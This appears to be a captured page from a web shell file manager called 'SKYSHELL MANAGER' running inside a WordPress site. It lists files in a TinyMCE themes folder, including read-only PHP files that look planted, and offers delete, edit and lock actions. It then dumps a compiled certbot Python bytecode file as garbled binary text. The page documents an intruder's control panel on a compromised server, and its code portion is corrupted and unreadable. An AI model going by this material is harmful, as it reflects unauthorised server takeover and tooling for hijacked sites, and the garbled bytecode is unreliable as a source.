📁
SKYSHELL MANAGER
PHP v8.3.6
Create
Create
Path:
root
/
var
/
www
/
cstage
/
wp-includes
/
js
/
tinymce
/
themes
/
Name
Size
Perm
Actions
📁
inlite
-
0755
🗑️
🏷️
🔒
📁
modern
-
0755
🗑️
🏷️
🔒
📄
ms-files.php
6.83 KB
0444
🗑️
🏷️
⬇️
✏️
🔒
📄
wp-activate.php
6.83 KB
0444
🗑️
🏷️
⬇️
✏️
🔒
Edit: override_fedora.cpython-312.pyc
� M/�e� � � � d Z ddlmZ ddlmZ ddlmZ ddlmZ ddlmZ ddlm Z ddl mZ G d � d ej � Z G d� de j � Zy )z5 Distribution specific override class for Fedora 29+ � )�Any)�errors)�util)�apache_util)�configurator)�parser)� OsOptionsc �x � � e Zd ZdZ edddddddgdd gdd gddgd�� Zd� fd �Zdd�Zd� fd�Zd� fd�Z � xZ S )�FedoraConfiguratorz5Fedora 29+ specific ApacheConfigurator override classz /etc/httpdz/etc/httpd/conf.dz*.confz/var/log/httpd�httpdz-v� apachectl�graceful�restart� configtest) �server_root� vhost_root�vhost_files� logs_root�ctl�version_cmd�restart_cmd�restart_cmd_alt�conftest_cmd�challenge_locationc �v �� t �| � � y# t j $ r | j � Y yw xY w)a( Override config_test to mitigate configtest error in vanilla installation of mod_ssl in Fedora. The error is caused by non-existent self-signed certificates referenced by the configuration, that would be autogenerated during the first (re)start of httpd. N)�super�config_testr �MisconfigurationError�_try_restart_fedora��self� __class__s ��J/usr/lib/python3/dist-packages/certbot_apache/_internal/override_fedora.pyr zFedoraConfigurator.config_test s4 �� � '��G��!���+�+� '��$�$�&� '�s � �#8�8c � � t | j j | | j j | j � S )zInitializes the ApacheParser)�FedoraParser�optionsr r �version)r! s r# � get_parserzFedoraConfigurator.get_parser( s2 � ���L�L�$�$�d�D�L�L�,C�,C�T�\�\�S� S� c �� �� t j g d�� t �| � � y# t j $ r#}t j t |� � �d}~ww xY w)z^ Tries to restart httpd using systemctl to generate the self signed key pair. )� systemctlr r N)r � run_scriptr �SubprocessErrorr �strr r )r! �errr"